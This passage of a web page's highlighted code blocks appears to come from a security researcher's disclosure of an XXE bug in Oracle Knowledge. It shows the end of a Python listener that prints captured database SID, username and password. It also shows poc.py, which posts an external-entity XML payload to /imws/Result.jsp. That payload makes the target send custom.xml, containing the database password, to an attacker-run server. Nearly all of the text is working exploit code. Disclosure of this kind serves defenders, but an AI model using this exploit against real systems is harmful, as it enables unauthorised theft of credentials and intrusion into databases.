class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;user&gt;(.*)&lt;\/user&gt;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-37\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">matchpassword<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;password&gt;(.*)&lt;\/password&gt;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-38\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">matchurl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;url&gt;(.*)&lt;\/url&gt;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-39\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">matchuser <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">matchpassword <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchurl<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-40\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) The database SID is: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchurl<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-41\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) The database username is: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchuser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-42\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) The database password is: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchpassword<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-43\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-44\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-45\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-46\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;no more data from&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">client_address<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-49\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">Exception<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-52\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-53\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">finally<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Clean up the connection<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0049 seconds] -->  <\/p>\n<p><strong>poc.py<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fc5960148476\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  # Notes:  # &#8211; This code steals the C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml file via the XXE bug.  # &#8211; You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the &#8220;local xxe server&#8221;  # &#8211; The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed    import requests  import json  import sys    # burp, ftw  proxies = {    &#8220;http&#8221;: &#8220;http:\/\/127.0.0.1:8080&#8221;,  }    if len(sys.argv) &lt; 3:  \tprint &#8220;(+) Usage: %s [local xxe server:port] [target]&#8221; % sys.argv[0]  \tprint &#8220;(+) Example: %s 172.16.77.1:4567 172.16.77.128&#8243; % sys.argv[0]  \tsys.exit(1)  \t  localxxeserver = sys.argv[1]  target = sys.argv[2]    payload = {&#8216;method&#8217; : &#8216;2&#8217;, &#8216;inputXml&#8217;: &#8221;'&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;  &lt;!DOCTYPE root [  &lt;!ENTITY %% remote SYSTEM &#8220;http:\/\/%s\/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml&#8221;&gt;  %%remote;  %%int;  %%trick;]&gt;&#8221;&#8217; % localxxeserver}    url = &#8216;http:\/\/%s:8226\/imws\/Result.jsp&#8217; % target    headers = {&#8216;content-type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;}  print &#8220;(+) pulling custom.xml for the db password&#8230;&#8221;  r = requests.post(url, data=payload, headers=headers, proxies=proxies)  if r.status_code == 200:  \tprint &#8220;(!) Success! please check the gopher.py window!&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc5960148476-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc5960148476-40\">40<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-1\"><span class=\"crayon-p\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-2\"><span class=\"crayon-p\"># Notes:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-3\"><span class=\"crayon-p\"># &#8211; This code steals the C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml file via the XXE bug.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-4\"><span class=\"crayon-p\"># &#8211; You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the &#8220;local xxe server&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-5\"><span class=\"crayon-p\"># &#8211; The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">json<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-11\"><span class=\"crayon-p\"># burp, ftw<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-12\"><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/127.0.0.1:8080&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-14\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-16\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) Usage: %s [local xxe server:port] [target]&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) Example: %s 172.16.77.1:4567 172.16.77.128&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-20\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-21\"><span class=\"crayon-v\">localxxeserver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-22\"><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-24\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;method&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;2&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;inputXml&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-s\">&#8216;<span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-25\"><span class=\"crayon-s\">&lt;!DOCTYPE root [<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-26\"><span class=\"crayon-s\">&lt;!ENTITY %% remote SYSTEM &#8220;http:\/\/%s\/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml&#8221;&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-27\"><span class=\"crayon-s\"><span class=\"crayon-ta\">%<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">remote<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-28\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-29\"><span class=\"crayon-s\"><span class=\"crayon-ta\">%<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">int<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-30\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-31\"><span class=\"crayon-s\"><span class=\"crayon-ta\">%<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">trick<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-s\">&#8221;<\/span>&#8216;<span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">localxxeserver<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-32\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-34\"><span class=\"crayon-s\">url = &#8216;<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/%s:8226\/imws\/Result.jsp&#8217; % target<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-36\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;content-type&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/x-www-form-urlencoded&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-37\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) pulling custom.xml for the db password&#8230;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-38\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc5960148476-39\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc5960148476-40\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) Success! please check the gopher.py window!&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0085 